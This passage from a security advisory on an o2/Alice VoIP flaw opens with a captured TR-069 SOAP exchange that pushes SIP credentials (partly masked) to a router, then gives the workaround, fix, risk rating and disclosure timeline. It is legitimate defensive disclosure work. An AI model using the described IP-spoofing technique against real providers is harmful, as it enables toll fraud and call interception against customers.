InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.SIP.X_AVM-DE_UseAuthUsername </Name> <Value xsi:type="xsd:boolean">0</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.SIP.X_AVM-DE_CLIRType </Name> <Value xsi:type="xsd:int">5</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.PSTNFailOver </Name> <Value xsi:type="xsd:boolean">0</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.DTMFMethod </Name> <Value xsi:type="xsd:string">RFC2833</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.SIP.OutboundProxy </Name> <Value xsi:type="xsd:string">sip.alice-voip.de</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.SIP.UserAgentDomain </Name> <Value xsi:type="xsd:string">sip.alice-voip.de</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.SIP.RegistrarServer </Name> <Value xsi:type="xsd:string">sip.alice-voip.de</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.SIP.ProxyServer </Name> <Value xsi:type="xsd:string">sip.alice-voip.de</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.SIP.AuthPassword </Name> <Value xsi:type="xsd:string">0241463xxxxxxxxx</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.DirectoryNumber </Name> <Value xsi:type="xsd:string">463xxxxx</Value> </ParameterValueStruct> <ParameterValueStruct> <Name> InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.SIP.AuthUserName </Name> <Value xsi:type="xsd:string">49241463xxxxx</Value> </ParameterValueStruct> </ParameterList> <ParameterKey>39315850</ParameterKey> </cwmp:SetParameterValues> </soapenv:Body> </soapenv:Envelope> [msg24] CPE -> ACS B: --------------------- <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0"> <soap:Header> <cwmp:ID soap:mustUnderstand="1">393158501</cwmp:ID> </soap:Header> <soap:Body> <cwmp:SetParameterValuesResponse> <Status>0</Status> </cwmp:SetParameterValuesResponse> </soap:Body> </soap:Envelope> [msg25] CPE <- ACS B: --------------------- [empty] ------------------------------------------------------------------------ Workaround ========== o2 implemented countermeasures that prevent attackers from spoofing a victim's IP address in CWMP messages. This prevents attackers from retrieving arbitrary o2 customers' VoIP credentials. Fix === The CPE needs to be properly authenticated when communicating with the ACS. One option of doing so would be to provide the password of the DSL connection. This password is already known to the CPE as it has been entered manually by the customer during the initial setup process. Security Risk ============= This vulnerability allows the unauthorised usage of foreign VoIP telephone numbers. The victim will be charged with all costs resulting from fraudulent phone calls. Furthermore, an attacker may answer phone calls on behalf of the victim. Customers have no means of defending oneself from such an attack. Chances are that the attack will be noticed only by customers who regularly check their invoice. The vulnerability is therefore considered to pose a high risk. Timeline ======== 2014-09-08 - Potential vulnerability discovered 2014-09-20 - Vulnerability verified 2014-10-17 - ISP was notified about the vulnerability 2014-10-17 - ISP implemented first countermeasures 2014-10-24 - ISP wants to investigate further 2014-11-28 - ISP needs more time, depends on hardware manufacturer 2015-01-23 - ISP is still investigating, wants to permanently solve the problem 2015-03-31 - ISP is still working on the problem, asks for more time 2015-06-12 - ISP wants to notify the proper German authorities about the problem first while working on a solution 2015-06-18 - ISP notified German authorities (Bundesnetzagentur, BfDI, BSI) 2016-01-08 - Advisory released References ========== [0] https://www.iol.unh.edu/sites/default/files/knowledgebase/hnc/TR-069_Crash_Course.pdf RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen